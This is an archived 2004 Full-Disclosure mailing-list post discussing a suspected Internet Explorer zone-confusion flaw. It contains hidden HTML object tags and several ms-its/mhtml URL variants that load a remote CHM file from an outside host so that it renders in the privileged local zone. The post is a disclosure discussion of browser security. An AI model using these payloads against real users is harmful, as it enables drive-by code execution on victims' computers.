[Full-Disclosure] COELACANTH: After Math

http-equiv_at_excite.com
Date: 06/11/04

  • Next message: Rachael Treu-Gomes: "Re: [Full-Disclosure] !! Internet Explorer !!" 
    To: <full-disclosure@lists.netsys.com>
Date: Fri, 11 Jun 2004 14:17:37 -0000

    There is a sneaking suspicion that you can put the site contents
    in the so-called 'local zone' or 'my computer'.

    Since it validates the 'front end' of the address and ends up at
    the 'back end' this all would seem very similar to:

    <object data="ms-its:mhtml:file://C:foo.mhtml!
    http://www.malware.com//bad.chm::/foo.html" type="text/x-
    scriptlet" style="visibility:hidden">

    where Internet Explorer gets 'confused' by the url
    mhtml:file://C:foo.mhtml! switches to the local zone as a
    result of C:, stays there and passes through to the 'back end'
    http://www.malware.com//bad.chm::/foo.html on the remote server
    while in the 'local zone' and renders foo.html in there.

    If this peculiar DNS setup also has a 'proper' chm file on it
    the following should work [as it does on any server setup]:

    <object data="ms-its:http://www.malware.com//bad.chm::/foo.html"
    type="text/x-scriptlet" style="visibility:hidden">

    now as above if we include in the 'front end':

    ms-
    its:C:WINDOWSHelpiexplore.chm::/http://www.malware.com//bad.ch
    m::/foo.html

    It should see it as in C: and make its little 'zone'
    determination first, then pass through to the 'back end'

    http://www.malware.com//bad.chm::/foo.html

    and render foo.html in the 'local zone' even though it is on the
    remote server.

    You'd have to tinker quite a bit:

    ms-its:C:::/http://www.malware.com//bad.chm::/foo.html
    ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html

    etc.

    Anyone have a server they care to setup? 

    -- 
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
  • Next message: Rachael Treu-Gomes: "Re: [Full-Disclosure] !! Internet Explorer !!"

    Relevant Pages

    • COELACANTH: After Math
      ... http://www.malware.com//bad.chm::/foo.html on the remote server ... while in the 'local zone' and renders foo.html in there. ... If this peculiar DNS setup also has a 'proper' chm file on it ...
      (Bugtraq)
    • COELACANTH: After Math
      ... http://www.malware.com//bad.chm::/foo.html on the remote server ... while in the 'local zone' and renders foo.html in there. ... If this peculiar DNS setup also has a 'proper' chm file on it ...
      (Bugtraq)